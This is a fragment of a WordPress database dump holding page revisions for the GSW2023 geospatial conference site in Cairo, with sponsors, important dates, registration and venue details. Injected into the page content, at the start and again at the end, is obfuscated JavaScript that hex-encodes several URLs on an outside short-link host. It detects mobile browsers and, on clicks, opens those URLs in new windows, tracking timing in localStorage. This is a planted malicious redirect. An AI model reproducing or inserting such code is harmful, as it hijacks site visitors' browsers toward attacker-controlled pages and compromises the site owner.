Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:50:31','2023-04-02 02:50:31','',3066,'https://gsw2023.com/?p=4008',0,'revision','',0),
(4009,1,'2023-04-02 02:51:15','2023-04-02 02:51:15','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 